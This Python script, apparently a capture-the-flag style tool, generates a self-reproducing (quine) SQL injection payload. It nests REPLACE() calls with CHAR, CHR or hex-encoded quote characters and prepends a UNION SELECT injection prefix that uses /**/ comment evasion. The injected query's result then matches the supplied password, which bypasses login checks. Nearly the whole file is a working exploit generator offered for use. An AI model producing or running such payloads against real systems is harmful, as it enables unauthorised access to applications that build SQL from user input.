Qunie构造脚本(payload==password).py

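# Shape of the two templates the class builds; <encoded replace_B> is the
# placeholder character written as CHAR(n), CHR(n) or a 0x hex literal.
# replace_S = REPLACE(REPLACE('replace_A',CHAR(34),CHAR(39)),<encoded replace_B>,'replace_A')
# replace_A = REPLACE(REPLACE("replace_B",CHAR(34),CHAR(39)),<encoded replace_B>,"replace_B")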

class rep:
    """Expand a template into a nested SQL ``REPLACE(...)`` expression.

    The generated text is laid out so that the inner string literal is a
    double-quoted copy of the outer statement (a quine-style construction).
    It only has an effect where user input is concatenated into a SQL
    statement; with bound parameters the whole string is plain data.

    Attributes set by the caller before ``reppay()``:
        replace_S: template text containing the marker ``REPLACE_BASE``.
        replace_B: the single placeholder character (``ord()`` is applied
            to it, so anything but one character raises ``TypeError``).
        replace_charfuc: how character codes are written: ``CHAR``,
            ``CHR`` or ``0x`` (compared case-insensitively, emitted as given).

    Attributes written by ``reppay()``:
        replace_S: the template with ``REPLACE_BASE`` expanded.
        replace_A: ``replace_S`` with single quotes turned into double
            quotes and ``replace_A`` renamed to ``replace_B``.
        result: the final generated string.
    """

    replace_S = ""
    replace_A = ""
    replace_B = ""
    replace_charfuc = ""
    result = ""

    def reppay(self):
        """Build ``self.result`` from the configured template and print it.

        Prints the intermediate templates, then the finished string.
        Terminates via ``exit()`` when ``replace_charfuc`` is not one of
        the supported spellings.
        """
        outer_call = "REPLACE(replace_temp,char_B,'replace_A')"
        inner_call = "REPLACE('replace_A',tempchar_a,tempchar_b)"

        # Expand the marker in two passes: outer REPLACE first, then the
        # inner REPLACE that swaps the two quote characters.
        expanded = self.replace_S.replace("REPLACE_BASE", outer_call)
        self.replace_S = expanded.replace("replace_temp", inner_call)

        # The embedded copy uses double quotes so that it can sit inside the
        # single-quoted literal of the outer statement.
        double_quoted = self.replace_S.replace("'", '"')
        self.replace_A = double_quoted.replace("replace_A", "replace_B")

        rule = "-" * 20
        print(rule)
        for label, value in (
            ("replace_S", self.replace_S),
            ("replace_A", self.replace_A),
            ("replace_B", self.replace_B),
        ):
            print(label + " is " + value)
        print(rule)

        embedded = self.replace_S.replace("replace_A", self.replace_A)
        self.result = embedded.replace("replace_B", self.replace_B)

        func = self.replace_charfuc
        mode = func.lower()
        if mode in ("char", "chr"):
            # Function-call spelling: CHAR(66) / CHR(66), with 34 = '"' and 39 = "'".
            encoded_b = func + "(" + str(ord(self.replace_B)) + ")"
            double_quote = func + "(34)"
            single_quote = func + "(39)"
        elif mode == "0x":
            # Hex-literal spelling of the same three character codes.
            encoded_b = func + format(ord(self.replace_B), "x")
            double_quote = func + "22"
            single_quote = func + "27"
        else:
            exit("ERROR replace_charfuc")

        # Order matters only in that each token is substituted exactly once.
        substitutions = (
            ("char_B", encoded_b),
            ("tempchar_a", double_quote),
            ("tempchar_b", single_quote),
        )
        for token, replacement in substitutions:
            self.result = self.result.replace(token, replacement)

        print("payload is\n")
        print(self.result)


payload = rep()

# Template to expand; write REPLACE_BASE where the REPLACE(...) part goes.
payload.replace_S = "'/**/union/**/select/**/REPLACE_BASE#"

# Placeholder used during substitution; must be exactly one character.
payload.replace_B = "B"

# How character codes are written: 0x, CHAR or CHR (any letter case).
payload.replace_charfuc = "0x"

payload.reppay()